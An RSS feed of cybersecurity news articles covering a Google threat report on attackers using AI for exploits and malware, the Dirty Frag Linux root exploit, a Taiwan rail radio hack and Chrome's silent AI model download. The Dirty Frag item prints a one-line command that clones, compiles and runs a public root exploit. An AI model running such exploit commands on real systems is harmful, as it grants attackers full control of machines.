                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/HW4qxknDwJwEJwDFgE3z9o-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Robots manufacturing robots]]></media:description>                                                            <media:text><![CDATA[Robots manufacturing robots]]></media:text>
                                <media:title type="plain"><![CDATA[Robots manufacturing robots]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/HW4qxknDwJwEJwDFgE3z9o-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The Google Threat Intelligence Group (GTIG) has <a href="https://cloud.google.com/blog/topics/threat-intelligence/ai-vulnerability-exploitation-initial-access" target="_blank">just published a report</a> on the hacktivities of blackhats everywhere, and the painted picture is quite sobering. Not only are attackers predictably using clankers to automate their efforts, but they're also putting them to rather creative use in almost every area of cybercrime, including developing at least one zero-day exploit. Even more concerning, malware that can modify its own source code and create exploit payloads dynamically, and even generate decoy code, has been detected.</p><p>The attack in question was a Python script that allowed bypassing 2FA in a "popular open-source, web-based system administration tool." According to the GTIG, the exploit's code bore all the hallmarks of AI usage and abuses a logic flaw. GTIG remarks that for authorization flows, even the latest LLMs "struggle to navigate complex enterprise [...] logic," but they're really good at contextual reasoning. This means they have the ability to read source code and validate the developer's <em>intention</em> versus what's actually implemented, and thus quickly find unconsidered corner cases.</p><p>That's only one small slice of the report, though, seeing as GTIG found pervasive usage of AI over a good handful of cybersecurity operation types. Malicious hackers have always had their own software suites for creating and distributing exploits, but they can now rely on bots to significantly augment their capabilities. Agents can alter their source code in real-time or tweak their attack as they go along in an effort to evade detection.</p><p>The bots are also used to improve obfuscation in several layers, be it in adding filler code to their attack logic or adding multiple layers of indirection so that the code manages to hide its true intention. Needless to say, all these characteristics make it much harder for security software to detect or contain; examples include <a href="https://www.virustotal.com/gui/collection/malware--30f26e32-0393-5023-92ef-f677f1def61c/iocs" target="_blank">CANFAIL</a> and LONGSTREAM.</p><p>Software like the PROMPTSPY Android backdoor leverages Google Gemini (the cloud service, not the on-device variant) to deviously manipulate the user's phone. Nifty tricks, including taking screenshots and working out the UI elements presented to the user to then simulate interactions on their behalf, down to capturing PIN/pattern authentication, or intercepting Uninstall button clicks.</p><p>Additionally, the GTIG found instances of malware that can modify its own source code and create exploit payloads dynamically, and generate decoy code.</p><p>All those real-time morphing abilities extend to phishing and network attacks. For example, malfeasants ask bots to generate a company's organizational chart and generate custom phishing emails laden with real information collected from news, LinkedIn pages, or press releases.</p><p>One would imagine that the more data that users provide in their replies, the more convincing the counter-responses can be, too. GTIG says that information collected about financial, internal security, and human resources departments generally makes for the best phishing bait — all expertly cooked to best suit each targeted individual.</p><p>Surprising absolutely nobody, GTIG also noticed large-scale operations across a multitude of countries using AI for political purposes. The predictable tactics are generating fake images and videos, but bot usage is becoming more subtle and yet more effective. It's now become easy to generate believable voiceovers or replace just a few words and facial expressions in real video in order to push forward a particular message. Interspersing real footage with fake content for added believability has become a common theme as well.</p><p>The GTIG report is long, informative, and goes in-depth about all of the aforementioned topics, plus a few more. It's worth a read, perhaps with your alcoholic beverage of choice by your side.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Devastating 'Dirty Frag' exploit leaks out, gives immediate root access on most Linux machines since 2017, no patches available, no warning given — Copy Fail-like vulnerability had its embargo broken ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/dirty-frag-exploit-gets-root-on-most-linux-machines-since-2017-no-patches-available-no-warning-given-copy-fail-like-vulnerability-had-its-embargo-broken</link>
                                                                            <description>
                            <![CDATA[ Dirty Frag exploit gets root on most Linux machines since 2017, no patches available ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">mgfcobkMstPvcHaK9RZYSM</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/jUiTQD8NGQavENsfMbTkPH-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 08 May 2026 00:17:41 +0000</pubDate>                                                                                                                                <updated>Fri, 08 May 2026 00:28:39 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/jUiTQD8NGQavENsfMbTkPH-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Lock being picked]]></media:description>                                                            <media:text><![CDATA[Lock being picked]]></media:text>
                                <media:title type="plain"><![CDATA[Lock being picked]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/jUiTQD8NGQavENsfMbTkPH-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Here's a question for the systems administrators in the crowd: what's better than one instant-root™️Linux vulnerability that affects most every system since 2017? Two of them, of course. Today's bag of bad news comes by way of the <a href="https://github.com/V4bel/dirtyfrag/blob/master/README.md">Dirty Frag vulnerability</a>, which uses a mechanism similar to the <a href="https://www.tomshardware.com/tech-industry/cyber-security/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users">Copy Fail exploit</a> that's currently <a href="https://www.tomshardware.com/software/linux/cisa-flags-actively-exploited-copy-fail-linux-kernel-flaw-enabling-root-takeover-across-major-distros-unpatched-systems-may-remain-vulnerable-to-attack">setting the Linux server world on fire</a>. This vulnerability affects nearly every Linux install since 2017, and no advance warning was given, so there is no patch available. This appears to be due to a broken embargo that revealed the vulerability before preparations were made.  </p><p>As a refresher, any local user can instantly get root (administrator) access on an affected box, just by running a small program. The attack does not depend on specific system conditions or timing, as it's a straightforward logic bug. Most every popular Linux distribution since 2017 is affected, including but not limited to current versions of Ubuntu (24 and 26), Arch, RHEL, OpenSUSE, CentOS Stream, Fedora, and Alma. We even tested WSL2 ourselves and sure enough, "root" was the word.</p><p>Dirty Frag one-ups its cousin, though, as there are currently <em>zero</em> patches for it at the time of this writing, making it spectacularly dangerous. Even the mainline Linux kernel itself doesn't appear to have any patches, as one colleague of mine reported a successful trigger of the exploit on a CachyOS machine running kernel 7.0.3-1-cachyos, and also on an updated Arch box. Needless to say, keep your eyes peeled for updates and patch your servers the second they're available.</p><p>Mercifully, though, the machine gods made the mitigation easy and unlikely to affect the functioning of the vast majority of servers. One needs only to disable the esp4, esp6, and rxrpc modules. These are all related in various degrees to IPSec networking and unlikely to be used unless the machine in question is an IPSec client or server. You can disable the modules in question with:</p><pre class="line-numbers language-bash" language="bash" ><code>sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"</code></pre><p>The reason why Dirty Frag is catching everyone flat-footed is because although the vulnerability was reported to the Linux kernel team in April 30, an "unrelated third party" broke the embargo for the reveal. The website offers no more detail, but our best theory is that it means the exploit is already in use by malicious actors, prompting the embargo breakage. If you want to test your boxen, you can use:</p><pre class="line-numbers language-bash" language="bash" ><code>git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp</code></pre><p>As far as <a href="https://github.com/V4bel/dirtyfrag/blob/master/assets/write-up.md" target="_blank">technical details go</a>, the story isn't much different than with Copy Fail, relying on exploiting a zero-copy operation by splicing a page cache descriptor into it. The different is that this time around, the fallible code is in the IPSec-related modules. The original vulnerability is "xfrm-ESP Page Cache Write", introduced in kernel commit <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cac2661c53f3">cac2661c53f3 from 2017</a>, and present across most distros<em>. S</em>ince Ubuntu systems' AppArmor plugs that particular hole, the PoC chains a second exploit, "RxRPC Page-Cache Write", added <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2dc334f1a63a">in commit 2dc334f1a63a</a>.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ College student hacks Taiwan high-speed rail line with software defined radios, stopping four trains — 19 years without crypto key rotation ends in predictable result as hacker sails through 7 layers of protection ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/college-student-hacks-taiwan-high-speed-rail-line-stopping-four-trains-19-years-without-crypto-key-rotation-ends-in-predictable-result</link>
                                                                            <description>
                            <![CDATA[ College student hacks Taiwan high-speed rail line, stopping four trains ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">cXdQhJ8zWyvbYkVosoEpAQ</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/NsFVTyx9FEgGri9vfBci4C-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 07 May 2026 10:20:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/NsFVTyx9FEgGri9vfBci4C-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Taiwan high speed rail line]]></media:description>                                                            <media:text><![CDATA[Taiwan high speed rail line]]></media:text>
                                <media:title type="plain"><![CDATA[Taiwan high speed rail line]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/NsFVTyx9FEgGri9vfBci4C-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Techies and trains have always had a fairly close relationship, but some people seem to take that relationship to toxic levels. About a month ago, a 23-year-old Taiwanese student<a href="https://www.taipeitimes.com/News/taiwan/archives/2026/05/05/2003856781"> <u>"hacked" the country's high-speed rail line</u></a> using an SDR (Software-Defined Radio) filter and radios, remotely broadcasting a General Alarm sign, and triggering a manual emergency braking procedure.</p><p>The event brought four trains to a standstill for 48 minutes until the situation was verified as a false alarm, with reportedly no hard stops executed. Lin, the mind behind the operation, sailed through "seven verification layers" thanks to the fact that the TETRA (Terrestrial Trunked Radio) system in use hadn't had its cryptographic keys rotated in 19 years.</p><p>The extracurricular activity was quickly traced back to Lin, who seemingly answered the radio in an awkward manner and hung up. This prompted the train network to immediately review all beacons in use, followed by its CCTV footage. Working with the police, they followed the trail to Lin's home in Taichung. There, they found a laptop alongside several radios. Lin is now out on $3,200 bail while waiting for a trial and a judgment that could have him behind bars for 10 years.</p><p>Despite Lin's apparent lack of forethought, the "hack" didn't take much effort, as any radio system that goes 19 years without key rotation easily falls to a low-grade cloning attack.<a href="https://www.rtl-sdr.com/student-arrested-in-taiwan-for-using-sdr-and-handheld-radios-to-halt-four-high-speed-trains-with-tetra-hack/"> <u>RTL-SDR speculates</u></a> that the system in question used now-broken TEA1 encryption. However, we believe that since key rotation in TETRA needs to be configured and scheduled at installation, the likely answer is that it just wasn't implemented.</p><div  class="fancy-box"><div class="fancy_box-title">Go deeper with TH Premium: GPUs</div><div class="fancy_box_body"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' ><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="Wh9EZgD8NG9yUioNNgPB3d" name="ASUS RTX 5080 Noctua Edition - Continuing the legacy of acoustic excellence 6-26 screenshot" caption="" alt="Asus RTX 5080 Noctua Edition" src="https://cdn.mos.cms.futurecdn.net/Wh9EZgD8NG9yUioNNgPB3d.png" mos="" link="" align="" fullscreen="" width="" height="" attribution="" endorsement="" class="pinterest-pin-exclude"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: Noctua)</span></figcaption></figure><p class="fancy-box__body-text"><ul><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/gpus/desktop-gpu-roadmap-nvidia-rubin-amd-udna-and-intel-xe3-celestial?utm_source=edit-links&utm_medium=boxout&utm_term=gpu" target="_blank">Desktop Roadmap</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/semiconductors/nvidia-enterprise-roadmap-rubin-rubin-ultra-feynman-and-silicon-photonics?utm_source=edit-links&utm_medium=boxout&utm_term=gpu" target="_blank">Enterprise Roadmap</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/gpus/nvidias-vera-rubin-platform-in-depth-inside-nvidias-most-complex-ai-and-hpc-platform-to-date?utm_source=edit-links&utm_medium=boxout&utm_term=gpu" target="_blank">Rubin in-depth</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/cooling/the-stout-owl-how-i-built-the-ultimate-noctua-g2-pc?utm_source=edit-links&utm_medium=boxout&utm_term=gpu" target="_blank">The Stout Owl: The ultimate Noctua G2 PC</a></li></ul></p></div></div><p>Lin reportedly also had information on how to access the comms of the New Taipei Fire City Department and the Taoyuan International Airport MRT Line. The incident triggered a round of political ping-pong to assess responsibilities for the weak security and a formal review of all aforementioned radio systems.</p><p>Democratic Progressive Party Legislator Ho Shin-chun clearly stated, "If a college student could hack into a system as sophisticated as that of the high-speed rail system, what would happen if the same thing happened with the Taiwan Railway Corp’s system?"</p><p>As for Lin, he's using the Looney Tunes defense that it<a href="https://www.rtl-sdr.com/student-arrested-in-taiwan-for-using-sdr-and-handheld-radios-to-halt-four-high-speed-trains-with-tetra-hack/"> <u>was an accidental press</u></a> of a button on the radio he had in his pocket. It would have been easy for him to conduct himself better and take the ethical route by disclosing the vulnerability to the relevant authorities, as Taiwan appears to have a highly progressive attitude towards civil hacking in all forms.</p><p>This is exemplified by the<a href="https://g0v.tw/intl/en/manifesto/en/"> <u>g0v initiative</u></a>, which calls for open and transparent operations from regular citizens, an ethos that has official government support and<a href="https://www.route-fifty.com/digital-government/2020/09/hacking-the-pandemic-how-taiwans-digital-democracy-holds-covid-19-at-bay/314994/"> <u>was most useful during the COVID-19 </u></a>pandemic. There's a yearly<a href="https://focustaiwan.tw/politics/202512140012"> <u>Presidential Hackathon</u></a>, too, and Taiwan's National Institute of Cyber Security<a href="https://www.rti.org.tw/en/news?uid=3&pid=205156"> <u>recently awarded $17,000</u></a> for 20 reported vulnerabilities across a range of products.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Google Chrome 'silently' downloads 4GB AI model to your device without permission, report claims — researcher says practice may violate EU law, waste thousands of kilowatts of energy ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/google-chrome-silently-downloads-4gb-ai-model-to-your-device-without-permission-report-claims-researcher-says-practice-may-violate-eu-law-waste-thousands-of-kilowatts-of-energy</link>
                                                                            <description>
                            <![CDATA[ Security researcher says that Google is likely in violation of EU law and wasting thousands upon thousands of kilowatts. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">TNoe8fzqsPiSjanKZnnJnn</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/vvv86h5qSVRzov9gfNgdoj-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 06 May 2026 09:40:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Zak Killian ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/yonJziSpjzVFahKcUonJvi.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Zak Killian is a freelance contributor to Tom&#039;s Hardware who has also written for HotHardware and Tech Report. Ever since typing in games from magazines in ATARI BASIC on his family&#039;s Atari 800XL as a youth, Zak has been deeply fascinated with the capabilities of computers. His passion for gaming as a kid led to more technical engagement with PCs as a teenager, when he first built his own system: an AMD K6. Not long after, he founded his own PC repair shop in the year 2000. Now, decades later, he&#039;s still building and benchmarking new boxes, still gaming in every free hour, and still arguing on the internet with almost any opinion anyone has. Something of a modern-day Renaissance man, he may not be an expert on anything, but he knows just a little about nearly everything. &lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/vvv86h5qSVRzov9gfNgdoj-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty / NurPhoto]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Chrome]]></media:description>                                                            <media:text><![CDATA[Chrome]]></media:text>
                                <media:title type="plain"><![CDATA[Chrome]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/vvv86h5qSVRzov9gfNgdoj-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Security researcher Alexander Hanff, also known as "That Privacy Guy," has published a new analysis claiming that <a href="https://www.thatprivacyguy.com/blog/chrome-silent-nano-install/" target="_blank">Google Chrome is silently downloading</a> a roughly 4GB on-device AI model to users' machines without notice or consent. According to Hanff, the behavior mirrors a separate issue he recently identified involving Anthropic's desktop software, and together the two cases point to a broader pattern of how large tech companies deploy AI features.</p><p><a href="https://www.thatprivacyguy.com/blog/anthropic-spyware/" target="_blank">Hanff's earlier report</a> focused on Anthropic's Claude Desktop app, which he says quietly installed a browser integration bridge across multiple Chromium-based browsers on a system, including five browsers he did not even have installed. According to the researcher, this happened without any user prompt or meaningful disclosure, and the integration would reinstall itself if removed. He argues that this kind of silent modification of a user's environment violates both user expectations and, in his view, European privacy law.</p><p>That earlier finding serves as context for what Hanff describes as a similar but even larger-scale issue with Chrome. In his latest post, he says Chrome is now writing a file called "weights.bin" to disk, part of the company's on-device AI system based on its lightweight <a href="https://www.tomshardware.com/tech-industry/artificial-intelligence/google-announces-gemini-ai-and-a-new-mobile-app-subscription-options-will-offer-more-powerful-models" target="_blank">Gemini Nano model</a>. The file is approximately 4GB in size and is downloaded automatically on systems that meet certain hardware requirements. According to Hanff, there is no clear consent flow for this download. He says Chrome does not present a prompt explaining that a multi-gigabyte AI model will be stored locally, nor does it provide a straightforward setting to prevent it. Users who discover and delete the file will find it re-downloaded later unless they disable certain experimental flags or remove Chrome entirely.</p><p>To verify what was happening, Hanff conducted a controlled test using a fresh Chrome profile on macOS. He relied on the operating system's filesystem event logs, which record file activity independently of applications. According to his analysis, the browser created the model directory and downloaded the full 4GB payload in the background while no human interaction was taking place. The process completed in just over fourteen minutes, during what appeared to be idle browsing time. He also points to Chrome's own internal state files as corroborating evidence. These show that the browser evaluated the system's hardware capabilities and marked it as eligible for the on-device model before the download occurred. In Hanff's telling, this indicates that <a href="https://www.tomshardware.com/software/browsers/google-updates-chrome-incognito-mode-disclaimer-in-wake-of-dollar5-billion-data-collection-lawsuit" target="_blank">Chrome is proactively deciding</a> which users' machines should receive the model, rather than responding to an explicit user action.</p><p>Beyond the technical details, Hanff raises legal concerns. He argues that both the Anthropic case and the Chrome case likely violate provisions of EU law, including the ePrivacy Directive's rules on storing data on user devices and the GDPR's requirements around transparency and lawful processing. These claims have not been tested in court, but they reflect a growing tension between aggressive feature rollout and regulatory expectations, particularly in Europe.</p><div ><table><caption>Environmental cost of Gemini Nano deployment in Chrome</caption><thead><tr><th class="firstcol " ><p>Devices receiving the push</p></th><th  ><p>Total bytes pushed</p></th><th  ><p>Total energy</p></th><th  ><p>Total CO2e</p></th></tr></thead><tbody><tr><td class="firstcol " ><p>100 million (~3% of Chrome users)</p></td><td  ><p>400 petabytes</p></td><td  ><p>24 GWh</p></td><td  ><p>6,000 tons CO2e</p></td></tr><tr><td class="firstcol " ><p>500 million (~15% of Chrome users)</p></td><td  ><p>2 exabytes</p></td><td  ><p>120 GWh</p></td><td  ><p>30,000 tons CO2e</p></td></tr><tr><td class="firstcol " ><p>1 billion (~30% of Chrome users)</p></td><td  ><p>4 exabytes</p></td><td  ><p>240 GWh</p></td><td  ><p>60,000 tons CO2e</p></td></tr></tbody></table></div><p><em>(Data above calculated by Alexander Hanff)</em></p><p>A key focus of Hanff's post is the environmental cost of silently distributing a 4GB AI model, where he highlights the perils of distributing a file of this size on a global scale. If deployed across hundreds of millions or billions of devices, Hanff estimates the total emissions impact of simply distributing the file (not even using it) could reach tens of <a href="https://www.tomshardware.com/news/ssds-create-more-carbon-emissions-than-hdds-report" target="_blank">thousands of tons of CO2 equivalent</a>, an amount similar to the annual output of tens of thousands of cars. That estimate depends heavily on possibly dubious assumptions about scale and energy mix, but his broader point, that pushing large binaries to user devices is not free and the cost is externalized, is completely valid regardless of the math.</p><p>For many users, the more immediate concern is bandwidth. A 4GB download is trivial on an unlimited fiber connection, but that is <a href="https://www.tomshardware.com/news/broadband-internet-prices-speed-us-comparison" target="_blank">very much not the global norm</a>, nor is it common even in the United States. For users whose data is capped, metered, or expensive, including most of the developing world, silently transferring gigabytes of data can have real financial consequences. Even in developed markets, users on mobile hotspots or rural connections may feel the impact acutely. Hanff argues that downloading files of this size without clear notice or consent crosses a very clearly demarcated line, regardless of the feature being delivered.</p><p>Taken together, the two cases <a href="https://www.tomshardware.com/software/microsoft-office/microsoft-will-force-install-the-copilot-ai-app-for-users-with-desktop-versions-of-365-apps-like-word-and-excel-coming-october-with-no-way-to-opt-out-for-personal-users" target="_blank">reinforce a familiar criticism of large technology platforms</a>. According to Hanff, both Anthropic and Google acted first and left users to discover the consequences later. Whether it is silently registering deep system integrations (in the case of Claude Desktop) or downloading multi-gigabyte AI models in the background, the pattern is the same: the user's device is being treated as a deployment target rather than something the user actively controls. That framing may sound harsh, but it aligns with <a href="https://www.tomshardware.com/tech-industry/artificial-intelligence/new-local-ai-integration-into-firefox-spurs-complaints-of-cpu-going-nuts-chip-and-power-spikes-plague-new-version-141-x" target="_blank">long-standing complaints</a> about "dark patterns" in software design. Features that benefit the platform at the user's cost are enabled by default, buried behind obscure settings, or implemented in ways that make them difficult to remove. Hanff's reporting suggests that the shift toward on-device AI is not changing that dynamic, and in fact may be accelerating it.</p><p>Google has not publicly responded in detail to Hanff's findings at the time of writing, and the company may argue that these downloads are tied to legitimate product features and improve privacy by keeping AI processing local. Even so, the core question remains unresolved. If a browser is going to download gigabytes of data onto a user's machine, should that require an explicit opt-in? Hanff's answer is clearly yes. Whether regulators or users ultimately agree may determine how far companies can push this kind of behavior in the future.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Canonical under sustained DDoS attack as Ubuntu 26 releases — Iranian group 313 Team claims responsibility ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/canonical-under-sustained-ddos-attack-as-ubuntu-26-releases-iranian-group-313-team-claims-responsibility</link>
                                                                            <description>
                            <![CDATA[ Canonical under sustained DDoS attack as Ubuntu 26 releases ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">WmrXUCij2ZksRJGZTjXLMS</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/8izzbmJ92toHHLyjU3ky2G-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 01 May 2026 19:15:21 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/8izzbmJ92toHHLyjU3ky2G-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Data flow]]></media:description>                                                            <media:text><![CDATA[Data flow]]></media:text>
                                <media:title type="plain"><![CDATA[Data flow]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/8izzbmJ92toHHLyjU3ky2G-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
